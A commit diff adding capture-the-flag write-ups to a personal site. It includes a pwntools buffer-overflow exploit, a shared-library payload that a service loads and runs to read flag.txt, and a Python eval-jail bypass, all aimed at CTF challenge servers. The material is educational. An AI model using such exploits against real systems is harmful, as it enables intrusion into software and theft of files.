Adds CTFs to content

Add CTFs from 2024 to the content, htb apocalypse, spookyCTF,
buckeye ctf and some edits to the 404 ctf

content/writeups/2024/404_ctf/_index.md

@@ -1,7 +1,7 @@
 +++
 date = '2024-05-14T19:00:00+02:00'
-draft = true
-title = '404 ctf 2024'
+draft = false
+title = '404 ctf'
 +++
 
 2024 edition of the 404 ctf

content/writeups/2024/404_ctf/reverse/reversible_engineering/index.md

@@ -2,7 +2,7 @@
 date = '2024-05-14T19:00:00+02:00'
 draft = false
 title = 'Reversible engineering'
-tags = [ "rev" ]
+tags = [ "reverse" ]
 +++
 
 **Mon programme ne fonctionne pas à tout les coups il faut le lancer plusieurs fois pour obtenir le flag si quelqu'un arrive à comprendre pourquoi n'hésitez pas à me contacter sur discord (furtest).**

content/writeups/2024/buckeye_ctf/_index.md

@@ -0,0 +1,7 @@
++++
+date = '2024-09-30T12:00:00+02:00'
+draft = false 
+title = 'Buckeye CTF'
++++
+
+This is the only writeup I did for the buckeye ctf 2024

content/writeups/2024/buckeye_ctf/reverse/rev_thank/index.md

@@ -0,0 +1,67 @@
++++
+date = '2024-09-30T12:00:00+02:00'
+draft = false 
+title = 'rev / thank'
+tags = [ 'reverse' ]
++++
+
+Description: I am so grateful for your precious files!  
+
+nc challs.pwnoh.io 13373  
+
+# First look
+
+Connecting to netcat we get :
+```
+What is the size of your file (in bytes)?
+1234
+Send your file!
+azerty
+Thanks for your file!
+```
+
+Ok so we have to send a file.
+
+# Decompiling
+
+Lets open binary ninja and take a look.  
+- We find the function asking for the file size : [file size function](ask_file_size.png)
+- Space for the file is malloc'ed
+- The file is then asked for and read  
+
+![ask for file](ask_file.png)
+
+
+- After some checks and I believe a write to the disk we get to the interesting part
+
+# Exec function
+
+We find an interesting function, after a bit of reading the manual we understand that `dlopen` opens a shared library object, `dlsym` finds a symbol in it and returns its address which is then executed by `rax3()`.
+So we need to send a shared library object which contains a symbol `thank` (a function for example), and that function will get executed.
+Let's do it !!
+
+![exec function](exec_function.png)
+
+# Getting the flag
+
+We write a small c program with a thank function.
+
+```c
+#include <stdio.h>
+
+void thank(void){
+    FILE* file = fopen("flag.txt", "r");
+    char buff[101];
+    fgets(buff, 100, file);
+    printf("%s", buff);
+}
+```
+
+We then compile it and send it to the server.
+
+```bash
+gcc -shared -fPIC -o exploit.so exploit.c
+(echo `du -b exploit.so`; cat exploit.so) | nc challs.pwnoh.io 13373
+```
+
+And boom we get the flag (I didn't save it so can't put it here).

content/writeups/2024/htb_apocalypse/_index.md

@@ -0,0 +1,7 @@
++++
+date = '2024-06-22T15:41:13+02:00'
+draft = false 
+title = 'HTB apocalypse'
++++
+
+Two challenges solved for this ctf

content/writeups/2024/htb_apocalypse/misc/StopDropAndRoll.md

@@ -0,0 +1,70 @@
++++
+date = '2024-06-22T15:41:13+02:00'
+draft = false 
+title = 'Stop drop and roll'
+tags = [ 'misc' ]
++++
+
+A simple misc challenge which involves using a TCP connection to play a simple game in which you have to answer to a request with specific words.
+
+For exemple : `GORGE FIRE PHREAK` must be answered to by `STOP-ROLL-DROP`
+
+To do so I wrote a simple python script :
+```python
+import socket
+import time
+
+def main():
+    # Connect to the server
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect(("83.136.249.153", 30914))
+    s.recv(4096).decode()
+    s.sendall(b"y\n") # We must send 'y' to start the game
+    message = s.recv(1024).decode()[19:] # We receive the data
+    print(message)
+    while True:
+        response = create_response(handle_input(message)) # And we answer
+        print(response)
+        time.sleep(0.5)
+        s.sendall(response.encode())
+        time.sleep(0.5)
+        message = s.recv(4096).decode() # And we start again
+        print(message)
+
+
+def create_response(input:list) -> str:
+    back = str()
+    for mon in input:
+        # Add the correct word
+        if mon == "GORGE":
+            back += "STOP"
+        elif mon == "FIRE":
+            back += "ROLL"
+        elif mon == "PHREAK":
+            back += "DROP"
+        back += "-"
+    back = back[:-1] # Remove the last '-'
+    back += "\n"
+    return back
+
+def handle_input(input:str) -> list:
+    # Transform the data into a list to make it easier to handle
+    data_raw = str()
+    for c in input:
+        data_raw += c
+        if c == "\n": break
+    data = list()
+    word = str()
+    for c in data_raw:
+        if c != "," and c != " " and c != "\n":
+            word += c
+        elif c == ",":
+            data.append(word)
+            word = ""
+    data.append(word)
+    return data
+
+
+if __name__ == "__main__":
+    main()
+```

content/writeups/2024/htb_apocalypse/misc/unbreakable.md

@@ -0,0 +1,42 @@
++++
+date = '2024-06-22T15:41:13+02:00'
+draft = false 
+title = 'Unbreakable'
+tags = [ 'misc' ]
++++
+
+The goal of this challenge is to bypass the following python script to print a file to the screen.   
+We notice a blacklist which stops us from using quite a lot of characters.   
+Using open to get the content of the file and printing it is no problem : `print(open('flag.txt','r').read())`   
+The problem are the parenthesis in the eval which creates an error when trying to execute our command. `eval(ans + '()')`   
+I first tried to use str and use one of the str methods to convert the None returned by print to a string and avoid throwing an exception.  
+But it wasn't working so i found that it is possible to call multiple functions on one line by separating them with a comma.   
+So the final payload is : `print(open('flag.txt','r').read()),print`
+
+
+```python
+#!/usr/bin/python3
+
+banner1 = 'Coucou'
+
+banner2 = 'EZ'
+
+blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
+              ' ', '-', '!', '[', ']', '*', 'import',
+              'eval', 'banner', 'echo', 'cat', '%', 
+              '&', '>', '<', '+', '1', '2', '3', '4',
+              '5', '6', '7', '8', '9', '0', 'b', 's', 
+              'lower', 'upper', 'system', '}', '{' ]
+
+while True:
+  ans = input('Break me, shake me!\n\n$ ').strip()
+  
+  if any(char in ans for char in blacklist):
+    print(f'\n{banner1}\nNaughty naughty..\n')
+  else:
+    try:
+      eval(ans + '()')
+      print('WHAT WAS THAT?!\n')
+    except:
+      print(f"\n{banner2}\nI'm UNBREAKABLE!\n") 
+```

content/writeups/2024/spookyCTF/_index.md

@@ -0,0 +1,12 @@
++++
+date = '2024-10-28T09:17:00+02:00'
+draft = false 
+title = 'Spooky ctf'
++++
+
+The Spooky CTF is organised by NICC, NJIT's information & cybersecurity club.   
+You can check them out on [njiticc.com](https://njiticc.com/).  
+
+I mostly did bin (pwn and reverse) challenges as I started the CTF quite late.  
+On this site I separated the challenges in pwn and reverse categories but during the ctf both were mixed together.  
+In addition to the writeups below I also solved the web challenge Paranormal picture but didn't make a writeup for it.  

content/writeups/2024/spookyCTF/forensic/wont_somebody_think_of_the_children/index.md

@@ -0,0 +1,25 @@
++++
+date = '2024-10-28T09:17:00+02:00'
+draft = false 
+title = "Won't somebody think of the children"
+tags = [ 'forensic' ]
++++
+
+## Intro
+
+Name: wont-somebody-think-of-the-children   
+Description: If Loab is back, we might need the council to help us out. The problem is that Anna sent Maya looking for them but she still hasn't come back. This is her last known location... Maybe you can help find her.  
+I'd go, but I really don't want to be around those spooky ghost orphans.  
+Author: [Cyb0rgSw0rd](https://github.com/alfredsimpson)
+
+## Solve
+
+We get a really large svg, after fiddling around a bit I open it with Inkscape and find that some layers have names that are different than the others.
+So I disable every other layer and find the flag.
+Both files are available (the one with every layer and the one with the flag).
+
+![Original](yeoldeorphanarium.svg)
+
+![Solved (some layer disabled)](./solved.svg)
+
+The flag is : `NICC{H3ck_th3m_kids_what_@bout_the_council?}`

content/writeups/2024/spookyCTF/pwn/B00fer/exploit.py

@@ -0,0 +1,49 @@
+#!/usr/bin/python3
+from pwn import *
+
+# Allows you to switch between local/GDB/remote from terminal
+def start(argv=[], *a, **kw):
+    if args.GDB:  # Set GDBscript below
+        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+    elif args.REMOTE:  # ('server', 'port')
+        return remote(sys.argv[1], sys.argv[2], *a, **kw)
+    elif args.SSH:
+        exe = remote_exe
+        s=ssh(host='HOST',user='LOGIN',password='PASSWORD',port=0000)
+        return s.process([exe] + argv)
+    else:  # Run locally
+        exe = local_exe
+        return process([exe] + argv, *a, **kw)
+
+
+# Specify your GDB script here for debugging
+gdbscript = '''
+'''.format(**locals())
+
+
+# Set up pwntools for the correct architecture
+local_exe = 'B00fer'
+remote_exe = 'REMOTE'
+# This will automatically get context arch, bits, os etc
+elf = context.binary = ELF(local_exe, checksec=False)
+# Change logging level to help with debugging (error/warning/info/debug)
+#context.log_level = 'debug'
+context.log_level = 'error'
+
+# ===========================================================
+#                    EXPLOIT GOES HERE
+# ===========================================================
+
+payload = flat(
+        b'\x00'*5*8,
+        p64(0x401227) 
+        )
+
+write("payload", payload)
+
+io = start()
+
+io.sendlineafter(b'Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n', payload)
+
+io.recvline().decode()
+print(io.recvline().decode())

content/writeups/2024/spookyCTF/pwn/B00fer/flag.txt

@@ -0,0 +1 @@
+Furtest{FAKE_FLAG}

content/writeups/2024/spookyCTF/pwn/B00fer/index.md

@@ -0,0 +1,85 @@
++++
+date = '2024-10-28T09:17:00+02:00'
+draft = false 
+title = 'B00fer'
+tags = [ 'pwn' ]
++++
+
+## Intro
+
+Name: B00fer  
+Description:   
+    The Consortium sent us this file and connection info. Looks like they are taunting us.  
+    They are running the file at b00fer.niccgetsspooky.xyz, at port 9001. Try to get them to give up the flag.  
+    `nc b00fer.niccgetsspooky.xyz 9001`  
+Author: [Robert Blacha](https://github.com/RobertPBlacha)  
+  
+This will be a pwn challenge seeing the name and the fact that we are given a remote.  
+We are only given the binary, no source code.  
+
+## Exploring
+  
+Running checksec we see :
+- No stack canary
+- No PIE
+- The binary is not stripped
+
+Running the program we are asked for an input without much info on what to enter.
+
+Let's spin up ghidra and see what we're dealing with.
+```C
+int main(void)
+{
+  char buffer [32];
+  
+  setvbuf(stdout,(char *)0x0,2,0);
+  puts("Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n");
+  gets(buffer);
+  return 0;
+}
+```
+
+So we are facing a classic ret2win challenge, we even have a beautiful function named win.
+
+```c
+void win(void)
+{
+  char flag [40];
+  FILE *file;
+  
+  file = fopen("flag.txt","r");
+  fread(flag,1,0x20,file);
+  puts(flag);
+  puts("Good!\n");
+  exit(1);
+}
+```
+
+## Exploiting
+
+We simply need to overwrite the return address of main to call win.  
+First let's compute the offset, using pwndbg we find that win is at `0x401227` and that the return address of main will be replaced by the 6th byte in the buffer.  
+
+  
+To finish this we write a nice script using pwntools  
+
+```python
+payload = flat(
+        b'\x00'*5*8,
+        p64(0x401227) 
+        )
+
+io = start()
+
+io.sendlineafter(b'Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n', payload)
+
+io.recvline().decode()
+print(io.recvline().decode())
+```
+
+And we get the flag :
+
+```bash
+./exploit.py REMOTE b00fer.niccgetsspooky.xyz 9001
+NICC{Sp00ked_the_fl4g_0ut_of_m3}
+```

content/writeups/2024/spookyCTF/reverse/my_assm_hurts/index.md

@@ -0,0 +1,31 @@
++++
+date = '2024-10-28T09:17:00+02:00'
+draft = false 
+title = 'My assm hurts'
+tags = [ 'reverse' ]
++++
+
+## Intro 
+
+Name: my-assm-hurts  
+Description: As Mary was attempting to time travel, she slipped on a patch of ice and landed on her butt. While getting up from the ice, she found a cool-looking USB flash drive containing a file with some system code. Can you help Mary decrypt what information the file has?   
+Author: [TomB](https://github.com/Tomaszbrauntsch/)  
+
+This will be reverse.
+
+We get a file that looks like assembly or some intermediate compilation step, who would want to read that.
+
+## Solve
+
+I asked chatgpt to solve the challenge for me, thank god it did, I really didn't want to read that.  
+There was a link to the original transcript but it's down now.
+
+## Retranscription
+
+In the following I removed some parts where I was trying to see if it was possible to compile the file.  
+
+- me : By analyzing the file tell me exactly what the program does  
+- chatgpt : blablabla, By analyzing the character codes (strings like string8, string10, etc.), the program builds the text "NICE_{Hey_this_is_COOL}", blablabla   
+- me (in my head) : *Humm this looks like a flag however it is not the right format lets ask again*   
+- me : Are you sure this is the right string, analyze again to make sure (use a different method)
+- chatgpt : blablabla, the flag is `NICC{hEy_th1s-is_Co0L}`

content/writeups/2024/spookyCTF/reverse/the_gates_are_closed/index.md

@@ -0,0 +1,32 @@
++++
+date = '2024-10-28T09:17:00+02:00'
+draft = false 
+title = 'The gates are closed'
+tags = [ 'reverse' ]
++++
+
+## Intro
+
+Name: The gates are closed
+Description: A USB drive was found in front of the locked gates of an abandoned cemetery. It may contain information regarding the strange sightings reported to nearby authorities in the graveyard, which NICC decided to investigate.
+Author: [LoadinConfustion](https://github.com/loadinconfusion)
+
+This will be a reverse engineering challenge as we are not provided a remote.
+
+## Solve
+
+I first execute the file and get : `Nothing is going on here... :D`
+I then run `strings` on the file and get
+```
+_ITM_registerTMCloneTable
+PTE1
+u+UH
+TklDQ3s0X1IzNGxfRmw0Z30=
+Nothing is going on here... :D
+;*3$"
+GCC: (Debian 13.2.0-13) 13.2.0
+Scrt1.o
+```
+
+We find a base64 encoded string, we decode it (`echo TklDQ3s0X1IzNGxfRmw0Z30= | base64 -d`) and get the flag.
+`NICC{4_R34l_Fl4g}`

content/writeups/2024/spookyCTF/reverse/what_flag/index.md

@@ -0,0 +1,29 @@
++++
+date = '2024-10-28T09:17:00+02:00'
+draft = false 
+title = 'What flag'
+tags = [ 'reverse' ]
++++
+
+## Intro
+
+Name: what-flag  
+Description: NICC recieved a mysterious email with an executable file that does nothing. Can you figure out what this executable does?  
+Author: [TomB](https://github.com/Tomaszbrauntsch/)
+
+This is reverse engineering.
+The binary is not stripped, lets go with binary ninja.
+
+## Solve
+
+Main does nothing however we see a few functions named : u, h, h2, f, l, a, g
+Looking inside of them we see what seems to be part of the flag.
+Let's put these together
+- u : `NI`
+- h : `CC`
+- h2 : `{`
+- f : `uhH`
+- l : `_fl@g`
+- a : `_i`
+- g : `_ThInk}`
+We get : `NICC{uhH_fl@g_i_ThInk}`